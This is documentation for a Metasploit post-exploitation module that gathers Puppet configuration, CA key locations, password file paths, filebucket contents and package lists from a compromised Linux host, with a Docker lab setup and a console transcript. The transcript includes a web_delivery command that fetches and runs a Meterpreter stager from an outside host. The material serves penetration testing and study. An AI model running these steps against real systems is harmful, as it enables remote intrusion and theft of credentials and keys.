CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/post/linux/gather/puppet.md
Views: 1904
Vulnerable Application
This module will grab Puppet config files, credentials, host information, and file buckets
Docker-compose Install
Use the puppet files located here by following this script:
mkdir /tmp/puppet wget https://raw.githubusercontent.com/voxpupuli/crafty/main/puppet/oss/.env -O /tmp/puppet/.env wget https://raw.githubusercontent.com/voxpupuli/crafty/main/puppet/oss/compose.yaml -O /tmp/puppet/compose.yaml docker-compose -f /tmp/puppet/compose.yaml up
Now build out some content so theres interesting things to pull:
docker exec -it puppet_puppet_1 /bin/bash echo test >> /tmp/TestFile puppet filebucket -l backup /tmp/TestFile puppet module install puppetlabs-apache
Verification Steps
Install the application
Start msfconsole
Get an initial shell on the box
Do:
use post/linux/gather/puppetDo:
set session [#]Do:
runYou should get information about the puppet install and host.
Options
FILEBUCKET
If file bucket items should be pulled. Defaults to true
PUPPET
Location of puppet executable if not in a standard location. This is added to a list of default locations which includes /opt/puppetlabs/puppet/bin/puppet.
FACTER
Location of facter executable if not in a standard location. This is added to a list of default locations which includes /opt/puppetlabs/puppet/bin/facter.
Scenarios
Docker compose as mentioned above
Get initial access to the system
resource (puppet.rb)> use exploit/multi/script/web_delivery [*] Using configured payload python/meterpreter/reverse_tcp resource (puppet.rb)> set lhost 1.1.1.1 lhost => 1.1.1.1 resource (puppet.rb)> set srvport 8181 srvport => 8181 resource (puppet.rb)> set target 7 target => 7 resource (puppet.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp resource (puppet.rb)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1:8181/Gc7zrm8CdKGSe2 [*] Server started. [*] Run the following command on the target machine: wget -qO CmKyTd1N --no-check-certificate http://1.1.1.1:8181/Gc7zrm8CdKGSe2; chmod +x CmKyTd1N; ./CmKyTd1N& disown [*] Sending stage (3045380 bytes) to 172.20.0.3 [msf](Jobs:1 Agents:0) post(linux/gather/puppet) > [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.20.0.3:59338) at 2023-12-10 10:38:11 -0500
We now have a wget command, however the system doesn't have wget. Alter it to a curl command similar to curl http://1.1.1.1:8181/Gc7zrm8CdKGSe2 > uBgZi2eZ; chmod +x uBgZi2eZ; ./uBgZi2eZ& disown
You'll now need to get on the docker image: docker exec -it puppet_puppet_1 /bin/bash and run the `curl`` command.
resource (puppet.rb)> use post/linux/gather/puppet resource (puppet.rb)> set session 1 resource (puppet.rb)> set verbose true verbose => true [msf](Jobs:1 Agents:1) post(linux/gather/puppet) > run [+] Stored puppet config to: /root/.msf4/loot/20231210104539_default_172.20.0.3_puppet.conf_250032.txt [+] Puppet Configuration ==================== Parameter Value Loot Location --------- ----- ------------- cacert /etc/puppetlabs/puppetserver/ca/ca_crt.pem /root/.msf4/loot/20231210104540_default_172.20.0.3_etcpuppetlabs_837639.txt cakey /etc/puppetlabs/puppetserver/ca/ca_key.pem /root/.msf4/loot/20231210104540_default_172.20.0.3_etcpuppetlabs_098956.txt passfile /etc/puppetlabs/puppet/ssl/private/password server puppet user puppet [+] Puppet Modules ============== Module Version ------ ------- puppetlabs-apache v11.1.0 puppetlabs-concat v9.0.1 puppetlabs-stdlib v9.4.1 [*] Retrieving filebucket contents: /tmp/TestFile [+] Puppet Filebucket Files ======================= Hash Date Filename Loot location ---- ---- -------- ------------- 9252a75c942da16f7b52cab752797dea4fca18474db9d7eff102842a459b25b3 2023-12-09 12:17:58 /tmp/TestFile /root/.msf4/loot/20231210104544_default_172.20.0.3_puppet.filebucke_189638.txt [+] Stored facter to: /root/.msf4/loot/20231210104545_default_172.20.0.3_puppet.facter_436612.txt [+] Stored packages to: /root/.msf4/loot/20231210104547_default_172.20.0.3_puppet.packages_320990.txt [+] Puppet Packages =============== Package Version Source ------- ------- ------ adduser 3.118ubuntu5 apt apt 2.4.10 apt base-files 12ubuntu4.4 apt base-passwd 3.5.52build1 apt base64 0.2.0 puppet_gem bash 5.1-6ubuntu1 apt benchmark 0.1.0 puppet_gem bigdecimal 2.0.0 puppet_gem bsdutils 1:2.37.2-4ubuntu3 apt bundler 2.1.4 puppet_gem ca-certificates 20230311ubuntu0.22.04.1 apt ca-certificates-java 20190909ubuntu1.2 apt cgi 0.1.0.2 puppet_gem colored2 3.1.2 puppet_gem concurrent-ruby 1.1.9 puppet_gem coreutils 8.32-4.1ubuntu1 apt cri 2.15.11 puppet_gem csv 3.1.2 puppet_gem dash 0.5.11+git20210903+057cd650a4ed-3build1 apt date 3.0.3 puppet_gem debconf 1.5.79ubuntu1 apt debianutils 5.5-1ubuntu2 apt deep_merge 1.2.2 puppet_gem delegate 0.1.0 puppet_gem did_you_mean 1.4.0 puppet_gem diffutils 1:3.8-0ubuntu2 apt dpkg 1.21.1ubuntu2.2 apt dumb-init 1.2.5 apt e2fsprogs 1.46.5-2ubuntu1.1 apt erubi 1.12.0 puppet_gem etc 1.1.0 puppet_gem facter 4.5.1 puppet_gem faraday 2.7.11 puppet_gem faraday-follow_redirects 0.3.0 puppet_gem faraday-net_http 3.0.2 puppet_gem fast_gettext 2.3.0 puppet_gem fcntl 1.0.0 puppet_gem ffi 1.15.5 puppet_gem fiddle 1.0.0 puppet_gem fileutils 1.4.1 puppet_gem findutils 4.8.0-1ubuntu3 apt fontconfig-config 2.13.1-4.2ubuntu5 apt fonts-dejavu-core 2.37-2build1 apt forwardable 1.3.1 puppet_gem gcc-12-base 12.3.0-1ubuntu1~22.04 apt getoptlong 0.1.0 puppet_gem gettext 3.4.9 puppet_gem gettext-setup 1.1.0 puppet_gem git 1:2.34.1-1ubuntu1.10 apt git-man 1:2.34.1-1ubuntu1.10 apt gpgv 2.2.27-3ubuntu2.1 apt grep 3.7-1build1 apt gzip 1.10-4ubuntu4.1 apt hiera 3.12.0 puppet_gem hiera-eyaml 3.4.0 puppet_gem highline 2.1.0 puppet_gem hocon 1.3.1 puppet_gem hostname 3.23ubuntu2 apt init-system-helpers 1.62 apt io-console 0.5.6 puppet_gem ipaddr 1.2.2 puppet_gem irb 1.2.6 puppet_gem java-common 0.72build2 apt json 2.3.0 puppet_gem jwt 2.7.1 puppet_gem libacl1 2.3.1-1 apt libapt-pkg6.0 2.4.10 apt libasound2 1.2.6.1-1ubuntu1 apt libasound2-data 1.2.6.1-1ubuntu1 apt libattr1 1:2.5.1-1build1 apt libaudit-common 1:3.0.7-1build1 apt libaudit1 1:3.0.7-1build1 apt libavahi-client3 0.8-5ubuntu5.1 apt libavahi-common-data 0.8-5ubuntu5.1 apt libavahi-common3 0.8-5ubuntu5.1 apt libblkid1 2.37.2-4ubuntu3 apt libbrotli1 1.0.9-2build6 apt libbsd0 0.11.5-1 apt libbz2-1.0 1.0.8-5build1 apt libc-bin 2.35-0ubuntu3.4 apt libc6 2.35-0ubuntu3.4 apt libcap-ng0 0.7.9-2.2build3 apt libcap2 1:2.44-1ubuntu0.22.04.1 apt libcom-err2 1.46.5-2ubuntu1.1 apt libcrypt1 1:4.4.27-1 apt libcups2 2.4.1op1-1ubuntu4.7 apt libcurl3-gnutls 7.81.0-1ubuntu1.14 apt libdb5.3 5.3.28+dfsg1-0.8ubuntu3 apt libdbus-1-3 1.12.20-2ubuntu4.1 apt libdebconfclient0 0.261ubuntu1 apt liberror-perl 0.17029-1 apt libexpat1 2.4.7-1ubuntu0.2 apt libext2fs2 1.46.5-2ubuntu1.1 apt libffi8 3.4.2-4 apt libfontconfig1 2.13.1-4.2ubuntu5 apt libfreetype6 2.11.1+dfsg-1ubuntu0.2 apt libgcc-s1 12.3.0-1ubuntu1~22.04 apt libgcrypt20 1.9.4-3ubuntu3 apt libgdbm-compat4 1.23-1 apt libgdbm6 1.23-1 apt libglib2.0-0 2.72.4-0ubuntu2.2 apt libgmp10 2:6.2.1+dfsg-3ubuntu1 apt libgnutls30 3.7.3-4ubuntu1.2 apt libgpg-error0 1.43-3 apt libgraphite2-3 1.3.14-1build2 apt libgssapi-krb5-2 1.19.2-2ubuntu0.2 apt libharfbuzz0b 2.7.4-1ubuntu3.1 apt libhogweed6 3.7.3-1build2 apt libidn2-0 2.3.2-2build1 apt libjpeg-turbo8 2.1.2-0ubuntu1 apt libjpeg8 8c-2ubuntu10 apt libk5crypto3 1.19.2-2ubuntu0.2 apt libkeyutils1 1.6.1-2ubuntu3 apt libkrb5-3 1.19.2-2ubuntu0.2 apt libkrb5support0 1.19.2-2ubuntu0.2 apt liblcms2-2 2.12~rc1-2build2 apt libldap-2.5-0 2.5.16+dfsg-0ubuntu0.22.04.1 apt liblz4-1 1.9.3-2build2 apt liblzma5 5.2.5-2ubuntu1 apt libmd0 1.0.4-1build1 apt libmount1 2.37.2-4ubuntu3 apt libncurses6 6.3-2ubuntu0.1 apt libncursesw6 6.3-2ubuntu0.1 apt libnettle8 3.7.3-1build2 apt libnghttp2-14 1.43.0-1build3 apt libnsl2 1.3.0-2build2 apt libnspr4 2:4.32-3build1 apt libnss3 2:3.68.2-0ubuntu1.2 apt libp11-kit0 0.24.0-6build1 apt libpam-modules 1.4.0-11ubuntu2.3 apt libpam-modules-bin 1.4.0-11ubuntu2.3 apt libpam-runtime 1.4.0-11ubuntu2.3 apt libpam0g 1.4.0-11ubuntu2.3 apt libpcre2-8-0 10.39-3ubuntu0.1 apt libpcre3 2:8.39-13ubuntu0.22.04.1 apt libpcsclite1 1.9.5-3ubuntu1 apt libperl5.34 5.34.0-3ubuntu1.2 apt libpng16-16 1.6.37-3build5 apt libprocps8 2:3.3.17-6ubuntu2 apt libpsl5 0.21.0-1.2build2 apt librtmp1 2.4+20151223.gitfa8646d.1-2build4 apt libsasl2-2 2.1.27+dfsg2-3ubuntu1.2 apt libsasl2-modules-db 2.1.27+dfsg2-3ubuntu1.2 apt libseccomp2 2.5.3-2ubuntu2 apt libselinux1 3.3-1build2 apt libsemanage-common 3.3-1build2 apt libsemanage2 3.3-1build2 apt libsepol2 3.3-1build1 apt libsmartcols1 2.37.2-4ubuntu3 apt libsqlite3-0 3.37.2-2ubuntu0.1 apt libss2 1.46.5-2ubuntu1.1 apt libssh-4 0.9.6-2ubuntu0.22.04.1 apt libssl3 3.0.2-0ubuntu1.10 apt libstdc++6 12.3.0-1ubuntu1~22.04 apt libsystemd0 249.11-0ubuntu3.10 apt libtasn1-6 4.18.0-4build1 apt libtinfo6 6.3-2ubuntu0.1 apt libtirpc-common 1.3.2-2ubuntu0.1 apt libtirpc3 1.3.2-2ubuntu0.1 apt libudev1 249.11-0ubuntu3.10 apt libunistring2 1.0-1 apt libuuid1 2.37.2-4ubuntu3 apt libx11-6 2:1.7.5-1ubuntu0.3 apt libx11-data 2:1.7.5-1ubuntu0.3 apt libxau6 1:1.0.9-1build5 apt libxcb1 1.14-3ubuntu3 apt libxdmcp6 1:1.1.3-0ubuntu5 apt libxext6 2:1.3.4-1build1 apt libxi6 2:1.8-1build1 apt libxrender1 1:0.9.10-1build4 apt libxtst6 2:1.2.3-1build4 apt libxxhash0 0.8.1-1 apt libzstd1 1.4.8+dfsg-3build1 apt locale 2.1.3 puppet_gem log4r 1.1.10 puppet_gem logger 1.4.2 puppet_gem login 1:4.8.1-2ubuntu2.1 apt logsave 1.46.5-2ubuntu1.1 apt lsb-base 11.1.0ubuntu4 apt matrix 0.2.0 puppet_gem mawk 1.3.4.20200120-3 apt minitar 0.9 puppet_gem minitest 5.13.0 puppet_gem mount 2.37.2-4ubuntu3 apt multi_json 1.15.0 puppet_gem mutex_m 0.1.0 puppet_gem ncurses-base 6.3-2ubuntu0.1 apt ncurses-bin 6.3-2ubuntu0.1 apt net-pop 0.1.0 puppet_gem net-smtp 0.1.0 puppet_gem net-ssh 4.2.0 puppet_gem net-telnet 0.2.0 puppet_gem net-tools 1.60+git20181103.0eebece-1ubuntu5 apt netbase 6.3 apt observer 0.1.0 puppet_gem open3 0.1.0 puppet_gem openjdk-17-jre-headless 17.0.8.1+1~us1-0ubuntu1~22.04 apt openjdk-8-jre-headless 8u382-ga-1~22.04.1 apt openssl 3.0.2-0ubuntu1.12 apt optimist 3.0.1 puppet_gem ostruct 0.2.0 puppet_gem passwd 1:4.8.1-2ubuntu2.1 apt perl 5.34.0-3ubuntu1.2 apt perl-base 5.34.0-3ubuntu1.2 apt perl-modules-5.34 5.34.0-3ubuntu1.2 apt power_assert 1.1.7 puppet_gem prime 0.1.1 puppet_gem procps 2:3.3.17-6ubuntu2 apt pstore 0.1.0 puppet_gem psych 3.1.0 puppet_gem puppet 7.27.0 puppet_gem puppet-agent 7.27.0-1jammy apt puppet-resource_api 1.9.0 puppet_gem puppet7-release 7.0.0-14jammy apt puppet_forge 5.0.3 puppet_gem puppetdb-termini 7.15.0-1jammy apt puppetserver 7.14.0-1jammy apt puppetserver-ca 2.6.0 puppet_gem r10k 4.0.0 puppet_gem racc 1.4.16 puppet_gem rake 13.0.1 puppet_gem rdoc 6.2.1.1 puppet_gem readline 0.0.2 puppet_gem readline-ext 0.1.0 puppet_gem reline 0.1.5 puppet_gem rexml 3.2.3.1 puppet_gem rss 0.2.8 puppet_gem ruby2_keywords 0.0.5 puppet_gem scanf 1.0.0 puppet_gem sdbm 1.0.0 puppet_gem sed 4.8-1ubuntu2 apt semantic_puppet 1.0.4 puppet_gem sensible-utils 0.0.17 apt singleton 0.1.0 puppet_gem stringio 0.1.0 puppet_gem strscan 1.0.3 puppet_gem sys-filesystem 1.4.4 puppet_gem sysvinit-utils 3.01-1ubuntu1 apt tar 1.34+dfsg-1ubuntu0.1.22.04.1 apt test-unit 3.3.4 puppet_gem text 1.3.1 puppet_gem thor 1.2.2 puppet_gem timeout 0.1.0 puppet_gem tracer 0.1.0 puppet_gem ubuntu-keyring 2021.03.26 apt ucf 3.0043 apt uri 0.10.0.2 puppet_gem usrmerge 25ubuntu2 apt util-linux 2.37.2-4ubuntu3 apt webrick 1.6.1 puppet_gem x11-common 1:7.7+23ubuntu2 apt xmlrpc 0.3.0 puppet_gem yaml 0.1.0 puppet_gem zlib 1.1.0 puppet_gem zlib1g 1:1.2.11.dfsg-2ubuntu9.2 apt [*] Post module execution completed